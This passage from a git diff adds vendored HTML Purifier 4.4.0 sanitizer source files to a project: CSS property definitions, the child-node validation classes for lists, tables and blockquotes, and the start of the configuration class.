'top', 'bottom')); + + $this->info['table-layout'] = new HTMLPurifier_AttrDef_Enum(array( + 'auto', 'fixed')); + + $this->info['vertical-align'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Enum(array('baseline', 'sub', 'super', + 'top', 'text-top', 'middle', 'bottom', 'text-bottom')), + new HTMLPurifier_AttrDef_CSS_Length(), + new HTMLPurifier_AttrDef_CSS_Percentage() + )); + + $this->info['border-spacing'] = new HTMLPurifier_AttrDef_CSS_Multiple(new HTMLPurifier_AttrDef_CSS_Length(), 2); + + // partial support + $this->info['white-space'] = new HTMLPurifier_AttrDef_Enum(array('nowrap')); + + if ($config->get('CSS.Proprietary')) { + $this->doSetupProprietary($config); + } + + if ($config->get('CSS.AllowTricky')) { + $this->doSetupTricky($config); + } + + if ($config->get('CSS.Trusted')) { + $this->doSetupTrusted($config); + } + + $allow_important = $config->get('CSS.AllowImportant'); + // wrap all attr-defs with decorator that handles !important + foreach ($this->info as $k => $v) { + $this->info[$k] = new HTMLPurifier_AttrDef_CSS_ImportantDecorator($v, $allow_important); + } + + $this->setupConfigStuff($config); + } + + protected function doSetupProprietary($config) { + // Internet Explorer only scrollbar colors + $this->info['scrollbar-arrow-color'] = new HTMLPurifier_AttrDef_CSS_Color(); + $this->info['scrollbar-base-color'] = new HTMLPurifier_AttrDef_CSS_Color(); + $this->info['scrollbar-darkshadow-color'] = new HTMLPurifier_AttrDef_CSS_Color(); + $this->info['scrollbar-face-color'] = new HTMLPurifier_AttrDef_CSS_Color(); + $this->info['scrollbar-highlight-color'] = new HTMLPurifier_AttrDef_CSS_Color(); + $this->info['scrollbar-shadow-color'] = new HTMLPurifier_AttrDef_CSS_Color(); + + // technically not proprietary, but CSS3, and no one supports it + $this->info['opacity'] = new HTMLPurifier_AttrDef_CSS_AlphaValue(); + $this->info['-moz-opacity'] = new HTMLPurifier_AttrDef_CSS_AlphaValue(); + $this->info['-khtml-opacity'] = new HTMLPurifier_AttrDef_CSS_AlphaValue(); + + // only opacity, for now + $this->info['filter'] = new HTMLPurifier_AttrDef_CSS_Filter(); + + } + + protected function doSetupTricky($config) { + $this->info['display'] = new HTMLPurifier_AttrDef_Enum(array( + 'inline', 'block', 'list-item', 'run-in', 'compact', + 'marker', 'table', 'inline-table', 'table-row-group', + 'table-header-group', 'table-footer-group', 'table-row', + 'table-column-group', 'table-column', 'table-cell', 'table-caption', 'none' + )); + $this->info['visibility'] = new HTMLPurifier_AttrDef_Enum(array( + 'visible', 'hidden', 'collapse' + )); + $this->info['overflow'] = new HTMLPurifier_AttrDef_Enum(array('visible', 'hidden', 'auto', 'scroll')); + } + + protected function doSetupTrusted($config) { + $this->info['position'] = new HTMLPurifier_AttrDef_Enum(array( + 'static', 'relative', 'absolute', 'fixed' + )); + $this->info['top'] = + $this->info['left'] = + $this->info['right'] = + $this->info['bottom'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_CSS_Length(), + new HTMLPurifier_AttrDef_CSS_Percentage(), + new HTMLPurifier_AttrDef_Enum(array('auto')), + )); + $this->info['z-index'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Integer(), + new HTMLPurifier_AttrDef_Enum(array('auto')), + )); + } + + /** + * Performs extra config-based processing. Based off of + * HTMLPurifier_HTMLDefinition. + * @todo Refactor duplicate elements into common class (probably using + * composition, not inheritance). + */ + protected function setupConfigStuff($config) { + + // setup allowed elements + $support = "(for information on implementing this, see the ". + "support forums) "; + $allowed_properties = $config->get('CSS.AllowedProperties'); + if ($allowed_properties !== null) { + foreach ($this->info as $name => $d) { + if(!isset($allowed_properties[$name])) unset($this->info[$name]); + unset($allowed_properties[$name]); + } + // emit errors + foreach ($allowed_properties as $name => $d) { + // :TODO: Is this htmlspecialchars() call really necessary? + $name = htmlspecialchars($name); + trigger_error("Style attribute '$name' is not supported $support", E_USER_WARNING); + } + } + + $forbidden_properties = $config->get('CSS.ForbiddenProperties'); + if ($forbidden_properties !== null) { + foreach ($this->info as $name => $d) { + if (isset($forbidden_properties[$name])) { + unset($this->info[$name]); + } + } + } + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef.php new file mode 100644 index 000000000..c5d5216da --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef.php @@ -0,0 +1,48 @@ +<?php + +/** + * Defines allowed child nodes and validates tokens against it. + */ +abstract class HTMLPurifier_ChildDef +{ + /** + * Type of child definition, usually right-most part of class name lowercase. + * Used occasionally in terms of context. + */ + public $type; + + /** + * Bool that indicates whether or not an empty array of children is okay + * + * This is necessary for redundant checking when changes affecting + * a child node may cause a parent node to now be disallowed. + */ + public $allow_empty; + + /** + * Lookup array of all elements that this definition could possibly allow + */ + public $elements = array(); + + /** + * Get lookup of tag names that should not close this element automatically. + * All other elements will do so. + */ + public function getAllowedElements($config) { + return $this->elements; + } + + /** + * Validates nodes according to definition and returns modification. + * + * @param $tokens_of_children Array of HTMLPurifier_Token + * @param $config HTMLPurifier_Config object + * @param $context HTMLPurifier_Context object + * @return bool true to leave nodes as is + * @return bool false to remove parent node + * @return array of replacement child tokens + */ + abstract public function validateChildren($tokens_of_children, $config, $context); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Chameleon.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Chameleon.php new file mode 100644 index 000000000..15c364ee3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Chameleon.php @@ -0,0 +1,48 @@ +<?php + +/** + * Definition that uses different definitions depending on context. + * + * The del and ins tags are notable because they allow different types of + * elements depending on whether or not they're in a block or inline context. + * Chameleon allows this behavior to happen by using two different + * definitions depending on context. While this somewhat generalized, + * it is specifically intended for those two tags. + */ +class HTMLPurifier_ChildDef_Chameleon extends HTMLPurifier_ChildDef +{ + + /** + * Instance of the definition object to use when inline. Usually stricter. + */ + public $inline; + + /** + * Instance of the definition object to use when block. + */ + public $block; + + public $type = 'chameleon'; + + /** + * @param $inline List of elements to allow when inline. + * @param $block List of elements to allow when block. + */ + public function __construct($inline, $block) { + $this->inline = new HTMLPurifier_ChildDef_Optional($inline); + $this->block = new HTMLPurifier_ChildDef_Optional($block); + $this->elements = $this->block->elements; + } + + public function validateChildren($tokens_of_children, $config, $context) { + if ($context->get('IsInline') === false) { + return $this->block->validateChildren( + $tokens_of_children, $config, $context); + } else { + return $this->inline->validateChildren( + $tokens_of_children, $config, $context); + } + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Custom.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Custom.php new file mode 100644 index 000000000..b68047b4b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Custom.php @@ -0,0 +1,90 @@ +<?php + +/** + * Custom validation class, accepts DTD child definitions + * + * @warning Currently this class is an all or nothing proposition, that is, + * it will only give a bool return value. + */ +class HTMLPurifier_ChildDef_Custom extends HTMLPurifier_ChildDef +{ + public $type = 'custom'; + public $allow_empty = false; + /** + * Allowed child pattern as defined by the DTD + */ + public $dtd_regex; + /** + * PCRE regex derived from $dtd_regex + * @private + */ + private $_pcre_regex; + /** + * @param $dtd_regex Allowed child pattern from the DTD + */ + public function __construct($dtd_regex) { + $this->dtd_regex = $dtd_regex; + $this->_compileRegex(); + } + /** + * Compiles the PCRE regex from a DTD regex ($dtd_regex to $_pcre_regex) + */ + protected function _compileRegex() { + $raw = str_replace(' ', '', $this->dtd_regex); + if ($raw{0} != '(') { + $raw = "($raw)"; + } + $el = '[#a-zA-Z0-9_.-]+'; + $reg = $raw; + + // COMPLICATED! AND MIGHT BE BUGGY! I HAVE NO CLUE WHAT I'M + // DOING! Seriously: if there's problems, please report them. + + // collect all elements into the $elements array + preg_match_all("/$el/", $reg, $matches); + foreach ($matches[0] as $match) { + $this->elements[$match] = true; + } + + // setup all elements as parentheticals with leading commas + $reg = preg_replace("/$el/", '(,\\0)', $reg); + + // remove commas when they were not solicited + $reg = preg_replace("/([^,(|]\(+),/", '\\1', $reg); + + // remove all non-paranthetical commas: they are handled by first regex + $reg = preg_replace("/,\(/", '(', $reg); + + $this->_pcre_regex = $reg; + } + public function validateChildren($tokens_of_children, $config, $context) { + $list_of_children = ''; + $nesting = 0; // depth into the nest + foreach ($tokens_of_children as $token) { + if (!empty($token->is_whitespace)) continue; + + $is_child = ($nesting == 0); // direct + + if ($token instanceof HTMLPurifier_Token_Start) { + $nesting++; + } elseif ($token instanceof HTMLPurifier_Token_End) { + $nesting--; + } + + if ($is_child) { + $list_of_children .= $token->name . ','; + } + } + // add leading comma to deal with stray comma declarations + $list_of_children = ',' . rtrim($list_of_children, ','); + $okay = + preg_match( + '/^,?'.$this->_pcre_regex.'$/', + $list_of_children + ); + + return (bool) $okay; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Empty.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Empty.php new file mode 100644 index 000000000..13171f665 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Empty.php @@ -0,0 +1,20 @@ +<?php + +/** + * Definition that disallows all elements. + * @warning validateChildren() in this class is actually never called, because + * empty elements are corrected in HTMLPurifier_Strategy_MakeWellFormed + * before child definitions are parsed in earnest by + * HTMLPurifier_Strategy_FixNesting. + */ +class HTMLPurifier_ChildDef_Empty extends HTMLPurifier_ChildDef +{ + public $allow_empty = true; + public $type = 'empty'; + public function __construct() {} + public function validateChildren($tokens_of_children, $config, $context) { + return array(); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/List.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/List.php new file mode 100644 index 000000000..cdaa2893a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/List.php @@ -0,0 +1,120 @@ +<?php + +/** + * Definition for list containers ul and ol. + */ +class HTMLPurifier_ChildDef_List extends HTMLPurifier_ChildDef +{ + public $type = 'list'; + // lying a little bit, so that we can handle ul and ol ourselves + // XXX: This whole business with 'wrap' is all a bit unsatisfactory + public $elements = array('li' => true, 'ul' => true, 'ol' => true); + public function validateChildren($tokens_of_children, $config, $context) { + // Flag for subclasses + $this->whitespace = false; + + // if there are no tokens, delete parent node + if (empty($tokens_of_children)) return false; + + // the new set of children + $result = array(); + + // current depth into the nest + $nesting = 0; + + // a little sanity check to make sure it's not ALL whitespace + $all_whitespace = true; + + $seen_li = false; + $need_close_li = false; + + foreach ($tokens_of_children as $token) { + if (!empty($token->is_whitespace)) { + $result[] = $token; + continue; + } + $all_whitespace = false; // phew, we're not talking about whitespace + + if ($nesting == 1 && $need_close_li) { + $result[] = new HTMLPurifier_Token_End('li'); + $nesting--; + $need_close_li = false; + } + + $is_child = ($nesting == 0); + + if ($token instanceof HTMLPurifier_Token_Start) { + $nesting++; + } elseif ($token instanceof HTMLPurifier_Token_End) { + $nesting--; + } + + if ($is_child) { + if ($token->name === 'li') { + // good + $seen_li = true; + } elseif ($token->name === 'ul' || $token->name === 'ol') { + // we want to tuck this into the previous li + $need_close_li = true; + $nesting++; + if (!$seen_li) { + // create a new li element + $result[] = new HTMLPurifier_Token_Start('li'); + } else { + // backtrack until </li> found + while(true) { + $t = array_pop($result); + if ($t instanceof HTMLPurifier_Token_End) { + // XXX actually, these invariants could very plausibly be violated + // if we are doing silly things with modifying the set of allowed elements. + // FORTUNATELY, it doesn't make a difference, since the allowed + // elements are hard-coded here! + if ($t->name !== 'li') { + trigger_error("Only li present invariant violated in List ChildDef", E_USER_ERROR); + return false; + } + break; + } elseif ($t instanceof HTMLPurifier_Token_Empty) { // bleagh + if ($t->name !== 'li') { + trigger_error("Only li present invariant violated in List ChildDef", E_USER_ERROR); + return false; + } + // XXX this should have a helper for it... + $result[] = new HTMLPurifier_Token_Start('li', $t->attr, $t->line, $t->col, $t->armor); + break; + } else { + if (!$t->is_whitespace) { + trigger_error("Only whitespace present invariant violated in List ChildDef", E_USER_ERROR); + return false; + } + } + } + } + } else { + // start wrapping (this doesn't precisely mimic + // browser behavior, but what browsers do is kind of + // hard to mimic in a standards compliant way + // XXX Actually, this has no impact in practice, + // because this gets handled earlier. Arguably, + // we should rip out all of that processing + $result[] = new HTMLPurifier_Token_Start('li'); + $nesting++; + $seen_li = true; + $need_close_li = true; + } + } + $result[] = $token; + } + if ($need_close_li) { + $result[] = new HTMLPurifier_Token_End('li'); + } + if (empty($result)) return false; + if ($all_whitespace) { + return false; + } + if ($tokens_of_children == $result) return true; + return $result; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Optional.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Optional.php new file mode 100644 index 000000000..32bcb9898 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Optional.php @@ -0,0 +1,26 @@ +<?php + +/** + * Definition that allows a set of elements, and allows no children. + * @note This is a hack to reuse code from HTMLPurifier_ChildDef_Required, + * really, one shouldn't inherit from the other. Only altered behavior + * is to overload a returned false with an array. Thus, it will never + * return false. + */ +class HTMLPurifier_ChildDef_Optional extends HTMLPurifier_ChildDef_Required +{ + public $allow_empty = true; + public $type = 'optional'; + public function validateChildren($tokens_of_children, $config, $context) { + $result = parent::validateChildren($tokens_of_children, $config, $context); + // we assume that $tokens_of_children is not modified + if ($result === false) { + if (empty($tokens_of_children)) return true; + elseif ($this->whitespace) return $tokens_of_children; + else return array(); + } + return $result; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Required.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Required.php new file mode 100644 index 000000000..4889f249b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Required.php @@ -0,0 +1,117 @@ +<?php + +/** + * Definition that allows a set of elements, but disallows empty children. + */ +class HTMLPurifier_ChildDef_Required extends HTMLPurifier_ChildDef +{ + /** + * Lookup table of allowed elements. + * @public + */ + public $elements = array(); + /** + * Whether or not the last passed node was all whitespace. + */ + protected $whitespace = false; + /** + * @param $elements List of allowed element names (lowercase). + */ + public function __construct($elements) { + if (is_string($elements)) { + $elements = str_replace(' ', '', $elements); + $elements = explode('|', $elements); + } + $keys = array_keys($elements); + if ($keys == array_keys($keys)) { + $elements = array_flip($elements); + foreach ($elements as $i => $x) { + $elements[$i] = true; + if (empty($i)) unset($elements[$i]); // remove blank + } + } + $this->elements = $elements; + } + public $allow_empty = false; + public $type = 'required'; + public function validateChildren($tokens_of_children, $config, $context) { + // Flag for subclasses + $this->whitespace = false; + + // if there are no tokens, delete parent node + if (empty($tokens_of_children)) return false; + + // the new set of children + $result = array(); + + // current depth into the nest + $nesting = 0; + + // whether or not we're deleting a node + $is_deleting = false; + + // whether or not parsed character data is allowed + // this controls whether or not we silently drop a tag + // or generate escaped HTML from it + $pcdata_allowed = isset($this->elements['#PCDATA']); + + // a little sanity check to make sure it's not ALL whitespace + $all_whitespace = true; + + // some configuration + $escape_invalid_children = $config->get('Core.EscapeInvalidChildren'); + + // generator + $gen = new HTMLPurifier_Generator($config, $context); + + foreach ($tokens_of_children as $token) { + if (!empty($token->is_whitespace)) { + $result[] = $token; + continue; + } + $all_whitespace = false; // phew, we're not talking about whitespace + + $is_child = ($nesting == 0); + + if ($token instanceof HTMLPurifier_Token_Start) { + $nesting++; + } elseif ($token instanceof HTMLPurifier_Token_End) { + $nesting--; + } + + if ($is_child) { + $is_deleting = false; + if (!isset($this->elements[$token->name])) { + $is_deleting = true; + if ($pcdata_allowed && $token instanceof HTMLPurifier_Token_Text) { + $result[] = $token; + } elseif ($pcdata_allowed && $escape_invalid_children) { + $result[] = new HTMLPurifier_Token_Text( + $gen->generateFromToken($token) + ); + } + continue; + } + } + if (!$is_deleting || ($pcdata_allowed && $token instanceof HTMLPurifier_Token_Text)) { + $result[] = $token; + } elseif ($pcdata_allowed && $escape_invalid_children) { + $result[] = + new HTMLPurifier_Token_Text( + $gen->generateFromToken($token) + ); + } else { + // drop silently + } + } + if (empty($result)) return false; + if ($all_whitespace) { + $this->whitespace = true; + return false; + } + if ($tokens_of_children == $result) return true; + return $result; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/StrictBlockquote.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/StrictBlockquote.php new file mode 100644 index 000000000..dfae8a6e5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/StrictBlockquote.php @@ -0,0 +1,88 @@ +<?php + +/** + * Takes the contents of blockquote when in strict and reformats for validation. + */ +class HTMLPurifier_ChildDef_StrictBlockquote extends HTMLPurifier_ChildDef_Required +{ + protected $real_elements; + protected $fake_elements; + public $allow_empty = true; + public $type = 'strictblockquote'; + protected $init = false; + + /** + * @note We don't want MakeWellFormed to auto-close inline elements since + * they might be allowed. + */ + public function getAllowedElements($config) { + $this->init($config); + return $this->fake_elements; + } + + public function validateChildren($tokens_of_children, $config, $context) { + + $this->init($config); + + // trick the parent class into thinking it allows more + $this->elements = $this->fake_elements; + $result = parent::validateChildren($tokens_of_children, $config, $context); + $this->elements = $this->real_elements; + + if ($result === false) return array(); + if ($result === true) $result = $tokens_of_children; + + $def = $config->getHTMLDefinition(); + $block_wrap_start = new HTMLPurifier_Token_Start($def->info_block_wrapper); + $block_wrap_end = new HTMLPurifier_Token_End( $def->info_block_wrapper); + $is_inline = false; + $depth = 0; + $ret = array(); + + // assuming that there are no comment tokens + foreach ($result as $i => $token) { + $token = $result[$i]; + // ifs are nested for readability + if (!$is_inline) { + if (!$depth) { + if ( + ($token instanceof HTMLPurifier_Token_Text && !$token->is_whitespace) || + (!$token instanceof HTMLPurifier_Token_Text && !isset($this->elements[$token->name])) + ) { + $is_inline = true; + $ret[] = $block_wrap_start; + } + } + } else { + if (!$depth) { + // starting tokens have been inline text / empty + if ($token instanceof HTMLPurifier_Token_Start || $token instanceof HTMLPurifier_Token_Empty) { + if (isset($this->elements[$token->name])) { + // ended + $ret[] = $block_wrap_end; + $is_inline = false; + } + } + } + } + $ret[] = $token; + if ($token instanceof HTMLPurifier_Token_Start) $depth++; + if ($token instanceof HTMLPurifier_Token_End) $depth--; + } + if ($is_inline) $ret[] = $block_wrap_end; + return $ret; + } + + private function init($config) { + if (!$this->init) { + $def = $config->getHTMLDefinition(); + // allow all inline elements + $this->real_elements = $this->elements; + $this->fake_elements = $def->info_content_sets['Flow']; + $this->fake_elements['#PCDATA'] = true; + $this->init = true; + } + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Table.php b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Table.php new file mode 100644 index 000000000..9a93421a1 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ChildDef/Table.php @@ -0,0 +1,227 @@ +<?php + +/** + * Definition for tables. The general idea is to extract out all of the + * essential bits, and then reconstruct it later. + * + * This is a bit confusing, because the DTDs and the W3C + * validators seem to disagree on the appropriate definition. The + * DTD claims: + * + * (CAPTION?, (COL*|COLGROUP*), THEAD?, TFOOT?, TBODY+) + * + * But actually, the HTML4 spec then has this to say: + * + * The TBODY start tag is always required except when the table + * contains only one table body and no table head or foot sections. + * The TBODY end tag may always be safely omitted. + * + * So the DTD is kind of wrong. The validator is, unfortunately, kind + * of on crack. + * + * The definition changed again in XHTML1.1; and in my opinion, this + * formulation makes the most sense. + * + * caption?, ( col* | colgroup* ), (( thead?, tfoot?, tbody+ ) | ( tr+ )) + * + * Essentially, we have two modes: thead/tfoot/tbody mode, and tr mode. + * If we encounter a thead, tfoot or tbody, we are placed in the former + * mode, and we *must* wrap any stray tr segments with a tbody. But if + * we don't run into any of them, just have tr tags is OK. + */ +class HTMLPurifier_ChildDef_Table extends HTMLPurifier_ChildDef +{ + public $allow_empty = false; + public $type = 'table'; + public $elements = array('tr' => true, 'tbody' => true, 'thead' => true, + 'tfoot' => true, 'caption' => true, 'colgroup' => true, 'col' => true); + public function __construct() {} + public function validateChildren($tokens_of_children, $config, $context) { + if (empty($tokens_of_children)) return false; + + // this ensures that the loop gets run one last time before closing + // up. It's a little bit of a hack, but it works! Just make sure you + // get rid of the token later. + $tokens_of_children[] = false; + + // only one of these elements is allowed in a table + $caption = false; + $thead = false; + $tfoot = false; + + // as many of these as you want + $cols = array(); + $content = array(); + + $nesting = 0; // current depth so we can determine nodes + $is_collecting = false; // are we globbing together tokens to package + // into one of the collectors? + $collection = array(); // collected nodes + $tag_index = 0; // the first node might be whitespace, + // so this tells us where the start tag is + $tbody_mode = false; // if true, then we need to wrap any stray + // <tr>s with a <tbody>. + + foreach ($tokens_of_children as $token) { + $is_child = ($nesting == 0); + + if ($token === false) { + // terminating sequence started + } elseif ($token instanceof HTMLPurifier_Token_Start) { + $nesting++; + } elseif ($token instanceof HTMLPurifier_Token_End) { + $nesting--; + } + + // handle node collection + if ($is_collecting) { + if ($is_child) { + // okay, let's stash the tokens away + // first token tells us the type of the collection + switch ($collection[$tag_index]->name) { + case 'tbody': + $tbody_mode = true; + case 'tr': + $content[] = $collection; + break; + case 'caption': + if ($caption !== false) break; + $caption = $collection; + break; + case 'thead': + case 'tfoot': + $tbody_mode = true; + // XXX This breaks rendering properties with + // Firefox, which never floats a <thead> to + // the top. Ever. (Our scheme will float the + // first <thead> to the top.) So maybe + // <thead>s that are not first should be + // turned into <tbody>? Very tricky, indeed. + + // access the appropriate variable, $thead or $tfoot + $var = $collection[$tag_index]->name; + if ($$var === false) { + $$var = $collection; + } else { + // Oops, there's a second one! What + // should we do? Current behavior is to + // transmutate the first and last entries into + // tbody tags, and then put into content. + // Maybe a better idea is to *attach + // it* to the existing thead or tfoot? + // We don't do this, because Firefox + // doesn't float an extra tfoot to the + // bottom like it does for the first one. + $collection[$tag_index]->name = 'tbody'; + $collection[count($collection)-1]->name = 'tbody'; + $content[] = $collection; + } + break; + case 'colgroup': + $cols[] = $collection; + break; + } + $collection = array(); + $is_collecting = false; + $tag_index = 0; + } else { + // add the node to the collection + $collection[] = $token; + } + } + + // terminate + if ($token === false) break; + + if ($is_child) { + // determine what we're dealing with + if ($token->name == 'col') { + // the only empty tag in the possie, we can handle it + // immediately + $cols[] = array_merge($collection, array($token)); + $collection = array(); + $tag_index = 0; + continue; + } + switch($token->name) { + case 'caption': + case 'colgroup': + case 'thead': + case 'tfoot': + case 'tbody': + case 'tr': + $is_collecting = true; + $collection[] = $token; + continue; + default: + if (!empty($token->is_whitespace)) { + $collection[] = $token; + $tag_index++; + } + continue; + } + } + } + + if (empty($content)) return false; + + $ret = array(); + if ($caption !== false) $ret = array_merge($ret, $caption); + if ($cols !== false) foreach ($cols as $token_array) $ret = array_merge($ret, $token_array); + if ($thead !== false) $ret = array_merge($ret, $thead); + if ($tfoot !== false) $ret = array_merge($ret, $tfoot); + + if ($tbody_mode) { + // a little tricky, since the start of the collection may be + // whitespace + $inside_tbody = false; + foreach ($content as $token_array) { + // find the starting token + foreach ($token_array as $t) { + if ($t->name === 'tr' || $t->name === 'tbody') { + break; + } + } // iterator variable carries over + if ($t->name === 'tr') { + if ($inside_tbody) { + $ret = array_merge($ret, $token_array); + } else { + $ret[] = new HTMLPurifier_Token_Start('tbody'); + $ret = array_merge($ret, $token_array); + $inside_tbody = true; + } + } elseif ($t->name === 'tbody') { + if ($inside_tbody) { + $ret[] = new HTMLPurifier_Token_End('tbody'); + $inside_tbody = false; + $ret = array_merge($ret, $token_array); + } else { + $ret = array_merge($ret, $token_array); + } + } else { + trigger_error("tr/tbody in content invariant failed in Table ChildDef", E_USER_ERROR); + } + } + if ($inside_tbody) { + $ret[] = new HTMLPurifier_Token_End('tbody'); + } + } else { + foreach ($content as $token_array) { + // invariant: everything in here is <tr>s + $ret = array_merge($ret, $token_array); + } + } + + if (!empty($collection) && $is_collecting == false){ + // grab the trailing space + $ret = array_merge($ret, $collection); + } + + array_pop($tokens_of_children); // remove phantom token + + return ($ret === $tokens_of_children) ? true : $ret; + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Config.php b/lib/htmlpurifier/library/HTMLPurifier/Config.php new file mode 100644 index 000000000..554980f22 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Config.php @@ -0,0 +1,709 @@ +<?php + +/** + * Configuration object that triggers customizable behavior. + * + * @warning This class is strongly defined: that means that the class + * will fail if an undefined directive is retrieved or set. + * + * @note Many classes that could (although many times don't) use the + * configuration object make it a mandatory parameter. This is + * because a configuration object should always be forwarded, + * otherwise, you run the risk of missing a parameter and then + * being stumped when a configuration directive doesn't work. + * + * @todo Reconsider some of the public member variables + */ +class HTMLPurifier_Config +{ + + /** + * HTML Purifier's version + */ + public $version = '4.4.0'; + + /** + * Bool indicator whether or not to automatically finalize + * the object if a read operation is done + */ + public $autoFinalize = true; + + // protected member variables + + /** + * Namespace indexed array of serials for specific namespaces (see + * getSerial() for more info). + */ + protected $serials = array(); + + /** + * Serial for entire configuration object + */ + protected $serial; + + /** + * Parser for variables + */ + protected $parser = null; + + /** + * Reference HTMLPurifier_ConfigSchema for value checking + * @note This is public for introspective purposes. Please don't + * abuse! + */ + public $def; + + /** + * Indexed array of definitions + */ + protected $definitions; + + /** + * Bool indicator whether or not config is finalized + */ + protected $finalized = false; + + /** + * Property list containing configuration directives. + */ + protected $plist; + + /** + * Whether or not a set is taking place due to an + * alias lookup. + */ + private $aliasMode; + + /** + * Set to false if you do not want line and file numbers in errors + * (useful when unit testing). This will also compress some errors + * and exceptions. + */ + public $chatty = true; + + /** + * Current lock; only gets to this namespace are allowed. + */ + private $lock; + + /** + * @param $definition HTMLPurifier_ConfigSchema that defines what directives + * are allowed. + */ + public function __construct($definition, $parent = null) { + $parent = $parent ? $parent : $definition->defaultPlist; + $this->plist = new HTMLPurifier_PropertyList($parent); + $this->def = $definition; // keep a copy around for checking + $this->parser = new HTMLPurifier_VarParser_Flexible(); + } + + /** + * Convenience constructor that creates a config object based on a mixed var + * @param mixed $config Variable that defines the state of the config + * object. Can be: a HTMLPurifier_Config() object, + * an array of directives based on loadArray(), + * or a string filename of an ini file. + * @param HTMLPurifier_ConfigSchema Schema object + * @return Configured HTMLPurifier_Config object + */ + public static function create($config, $schema = null) { + if ($config instanceof HTMLPurifier_Config) { + // pass-through + return $config; + } + if (!$schema) { + $ret = HTMLPurifier_Config::createDefault(); + } else { + $ret = new HTMLPurifier_Config($schema); + } + if (is_string($config)) $ret->loadIni($config); + elseif (is_array($config)) $ret->loadArray($config); + return $ret; + } + + /** + * Creates a new config object that inherits from a previous one. + * @param HTMLPurifier_Config $config Configuration object to inherit + * from. + * @return HTMLPurifier_Config object with $config as its parent. + */ + public static function inherit(HTMLPurifier_Config $config) { + return new HTMLPurifier_Config($config->def, $config->plist); + } + + /** + * Convenience constructor that creates a default configuration object. + * @return Default HTMLPurifier_Config object. + */ + public static function createDefault() { + $definition = HTMLPurifier_ConfigSchema::instance(); + $config = new HTMLPurifier_Config($definition); + return $config; + } + + /** + * Retreives a value from the configuration. + * @param $key String key + */ + public function get($key, $a = null) { + if ($a !== null) { + $this->triggerError("Using deprecated API: use \$config->get('$key.$a') instead", E_USER_WARNING); + $key = "$key.$a"; + } + if (!$this->finalized) $this->autoFinalize(); + if (!isset($this->def->info[$key])) { + // can't add % due to SimpleTest bug + $this->triggerError('Cannot retrieve value of undefined directive ' . htmlspecialchars($key), + E_USER_WARNING); + return; + } + if (isset($this->def->info[$key]->isAlias)) { + $d = $this->def->info[$key]; + $this->triggerError('Cannot get value from aliased directive, use real name ' . $d->key, + E_USER_ERROR); + return; + } + if ($this->lock) { + list($ns) = explode('.', $key); + if ($ns !== $this->lock) { + $this->triggerError('Cannot get value of namespace ' . $ns . ' when lock for ' . $this->lock . ' is active, this probably indicates a Definition setup method is accessing directives that are not within its namespace', E_USER_ERROR); + return; + } + } + return $this->plist->get($key); + } + + /** + * Retreives an array of directives to values from a given namespace + * @param $namespace String namespace + */ + public function getBatch($namespace) { + if (!$this->finalized) $this->autoFinalize(); + $full = $this->getAll(); + if (!isset($full[$namespace])) { + $this->triggerError('Cannot retrieve undefined namespace ' . htmlspecialchars($namespace), + E_USER_WARNING); + return; + } + return $full[$namespace]; + } + + /** + * Returns a md5 signature of a segment of the configuration object + * that uniquely identifies that particular configuration + * @note Revision is handled specially and is removed from the batch + * before processing! + * @param $namespace Namespace to get serial for + */ + public function getBatchSerial($namespace) { + if (empty($this->serials[$namespace])) { + $batch = $this->getBatch($namespace); + unset($batch['DefinitionRev']); + $this->serials[$namespace] = md5(serialize($batch)); + } + return $this->serials[$namespace]; + } + + /** + * Returns a md5 signature for the entire configuration object + * that uniquely identifies that particular configuration + */ + public function getSerial() { + if (empty($this->serial)) { + $this->serial = md5(serialize($this->getAll())); + } + return $this->serial; + } + + /** + * Retrieves all directives, organized by namespace + * @warning This is a pretty inefficient function, avoid if you can + */ + public function getAll() { + if (!$this->finalized) $this->autoFinalize(); + $ret = array(); + foreach ($this->plist->squash() as $name => $value) { + list($ns, $key) = explode('.', $name, 2); + $ret[$ns][$key] = $value; + } + return $ret; + } + + /** + * Sets a value to configuration. + * @param $key String key + * @param $value Mixed value + */ + public function set($key, $value, $a = null) { + if (strpos($key, '.') === false) { + $namespace = $key; + $directive = $value; + 